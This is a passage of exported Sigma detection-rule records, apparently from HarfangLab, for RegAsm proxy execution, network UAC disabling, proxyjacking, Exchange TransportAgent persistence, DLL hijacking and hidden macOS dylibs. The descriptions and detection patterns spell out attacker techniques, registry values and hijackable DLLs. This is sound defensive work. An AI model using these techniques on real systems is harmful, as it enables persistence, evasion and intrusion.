(x86)\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n\n exclusion_sap:\n ParentImage|endswith: '\\setup\\NwSapSetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'SAP SE'\n\n exclusion_configuration_manager:\n ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\cmupdate.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_kansysedge:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\kansysedge\\installscripts\\utilities\\reregisterassemblies.bat'\n\n exclusion_genapi:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\genapi\\gupta\\i-not\\regasm_dlls.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: 
medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4", + "rule_name": "Suspicious Proxy Execution via regasm.exe", + "rule_description": "Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\nThis may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\n", + "rule_creation_date": "2023-01-04", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218.009" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "03983a13-d23e-4494-b3c5-9b24bf51acfc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", 
+ "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.622015Z", + "creation_date": "2026-03-23T11:45:34.622017Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.622021Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://attack.mitre.org/techniques/T1112/" + ], + "name": "t1112_disable_filteradministratortoken.yml", + "content": "title: Network UAC Restrictions Disabled for Local Administrator\nid: 03983a13-d23e-4494-b3c5-9b24bf51acfc\ndescription: |\n Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\n By default this value is not set but adversaries may try to change it to circumvent a hardening policy.\n This will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) 
using the local administrator account with full privileges.\n It is recommended to investigate any suspicious authentication using the local administrator account.\nreferences:\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\FilterAdministratorToken'\n Details|contains: '?WORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_local_security_policy:\n ProcessImage|endswith: '\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_winoobe:\n ProcessGrandparentImage: '?:\\Windows\\System32\\setupugc.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows 
Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_logmein:\n ProcessImage: '?:\\Program Files (x86)\\LogMeIn\\x64\\LogMeIn.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "03983a13-d23e-4494-b3c5-9b24bf51acfc", + "rule_name": "Network UAC Restrictions Disabled for Local Administrator", + "rule_description": "Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\nBy default this value is not set but adversaries may try to change it to circumvent a hardening policy.\nThis will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\nIt is recommended to investigate any suspicious authentication using the local administrator account.\n", + "rule_creation_date": "2023-12-27", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1112" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.613613Z", + "creation_date": "2026-03-23T11:45:34.613616Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.613624Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking", + "https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html", + "https://attack.mitre.org/techniques/T1496/" + ], + "name": "t1496_earnfm.yml", + "content": "title: EarnFM Executed\nid: 039f1d5b-74b0-46d1-8a0e-dfa8bea707bd\ndescription: |\n Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.EarnFm\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n 
selection:\n CommandLine|contains: ' EARNFM_TOKEN='\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd", + "rule_name": "EarnFM Executed", + "rule_description": "Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n", + "rule_creation_date": "2024-09-26", + "rule_modified_date": "2025-02-12", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.impact" + ], + "rule_technique_tags": [ + "attack.t1496" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "03a594fd-50c7-4041-9c5c-706a4009f30a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.072500Z", + "creation_date": "2026-03-23T11:45:34.072502Z", + "enabled": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:34.072506Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook", + "https://attack.mitre.org/techniques/T1505/002/" + ], + "name": "t1505_002_new_exchange_transport_agent_powershell.yml", + "content": "title: New Exchange TransportAgent Installed via PowerShell\nid: 03a594fd-50c7-4041-9c5c-706a4009f30a\ndescription: |\n Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Install-TransportAgent '\n\n 
selection_assemblypath:\n PowershellCommand|contains:\n - ' -A ' # -AssemblyPath\n - ' -As ' # -AssemblyPath\n - ' -Ass ' # -AssemblyPath\n - ' -Asse ' # -AssemblyPath\n - ' -Assem ' # -AssemblyPath\n - ' -Assemb ' # -AssemblyPath\n - ' -Assembl ' # -AssemblyPath\n - ' -Assembly ' # -AssemblyPath\n - ' -AssemblyP ' # -AssemblyPath\n - ' -AssemblyPa ' # -AssemblyPath\n - ' -AssemblyPat ' # -AssemblyPath\n - ' -AssemblyPath ' # -AssemblyPath\n\n selection_transportagent:\n PowershellCommand|contains:\n - ' -T ' # -TransportAgentFactory\n - ' -Tr ' # -TransportAgentFactory\n - ' -Tra ' # -TransportAgentFactory\n - ' -Tran ' # -TransportAgentFactory\n - ' -Trans ' # -TransportAgentFactory\n - ' -Transp ' # -TransportAgentFactory\n - ' -Transpo ' # -TransportAgentFactory\n - ' -Transpor ' # -TransportAgentFactory\n - ' -Transport ' # -TransportAgentFactory\n - ' -TransportA ' # -TransportAgentFactory\n - ' -TransportAg ' # -TransportAgentFactory\n - ' -TransportAge ' # -TransportAgentFactory\n - ' -TransportAgen ' # -TransportAgentFactory\n - ' -TransportAgent ' # -TransportAgentFactory\n - ' -TransportAgentF ' # -TransportAgentFactory\n - ' -TransportAgentFa ' # -TransportAgentFactory\n - ' -TransportAgentFac ' # -TransportAgentFactory\n - ' -TransportAgentFact ' # -TransportAgentFactory\n - ' -TransportAgentFacto ' # -TransportAgentFactory\n - ' -TransportAgentFactor ' # -TransportAgentFactory\n - ' -TransportAgentFactory ' # -TransportAgentFactory\n\n exclusion_fsecure:\n PowershellCommand|contains: 'Install-TransportAgent -Name $AGENT -AssemblyPath $AGINSTDIR\\fstragnt.dll'\n\n exclusion_kaspersky:\n PowershellCommand|contains|all:\n - 'Kaspersky Security '\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Microsoft Exchange Servers\\Kse.ExchangeIntegration.Transport.dll'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Smex\\instSetupHelper.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: 
medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "03a594fd-50c7-4041-9c5c-706a4009f30a", + "rule_name": "New Exchange TransportAgent Installed via PowerShell", + "rule_description": "Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\n", + "rule_creation_date": "2022-11-08", + "rule_modified_date": "2025-05-26", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection", + "attack.command_and_control", + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1071.003", + "attack.t1104", + "attack.t1114.002", + "attack.t1505.002", + "attack.t1546.008" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "03d8eca6-3f1e-4d11-b989-2c6762458061", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.587248Z", + "creation_date": "2026-03-23T11:45:34.587252Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.587259Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://twitter.com/an0n_r0/status/1544472352657915904", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_diskpart.yml", + "content": "title: DLL Hijacking via diskpart.exe\nid: 03d8eca6-3f1e-4d11-b989-2c6762458061\ndescription: |\n Detects potential Windows DLL Hijacking via diskpart.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskpart.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n 
filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "03d8eca6-3f1e-4d11-b989-2c6762458061", + "rule_name": "DLL Hijacking via diskpart.exe", + "rule_description": "Detects potential Windows DLL Hijacking via diskpart.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + 
"whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092994Z", + "creation_date": "2026-03-23T11:45:34.092996Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093000Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1564/001/" + ], + "name": "t1564_001_hidden_dylib_loaded.yml", + "content": "title: Hidden Dylib File Loaded\nid: 03dfe441-3d70-41a1-8a9b-9e3c68cee99b\ndescription: |\n Detects a hidden dylib library being loaded.\n Adversaries can create hidden malicious libraries to avoid raising users' suspicions.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/06/03\nmodified: 2025/11/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '.*\\/\\.[^\\/]*$'\n\n exclusion_grr:\n ImageLoaded:\n - '/private/var/db/oah/*/*/.Python.aot'\n - '/usr/local/lib/grr/grr_*/.Python'\n Image: '/usr/local/lib/grr/grr_*/grr'\n\n exclusion_postman:\n Image: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_var_folder:\n ImageLoaded|startswith:\n - '/private/var/folders/??/'\n - '/private/var/db/???/'\n\n exclusion_claude:\n Image|contains:\n - '/claude/versions/'\n - '/claude-code/'\n - 
'/extensions/anthropic.claude-code-'\n - '/Users/*/.claude/'\n ImageLoaded: '/private/tmp/.????????????????-????????.node'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b", + "rule_name": "Hidden Dylib File Loaded", + "rule_description": "Detects a hidden dylib library being loaded.\nAdversaries can create hidden malicious libraries to avoid raising users' suspicions.\nIt is recommended to check the origin of the library to determine its legitimacy.\n", + "rule_creation_date": "2024-06-03", + "rule_modified_date": "2025-11-19", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1564.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591378Z", + "creation_date": "2026-03-23T11:45:34.591382Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591389Z", + 
"rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dsget.yml", + "content": "title: DLL Hijacking via dsget.exe\nid: 03fc1f68-4d9c-420b-b4a5-79fae4a133ee\ndescription: |\n Detects potential Windows DLL Hijacking via dsget.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsget.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee", + "rule_name": "DLL Hijacking via dsget.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dsget.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "04429fe5-8be4-4481-b930-acfc3c648434", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075966Z", + "creation_date": "2026-03-23T11:45:34.075968Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075973Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_gpupdate.yml", + "content": "title: DLL Hijacking via gpupdate.exe\nid: 04429fe5-8be4-4481-b930-acfc3c648434\ndescription: |\n Detects potential Windows DLL Hijacking via gpupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\wevtapi.dll'\n 
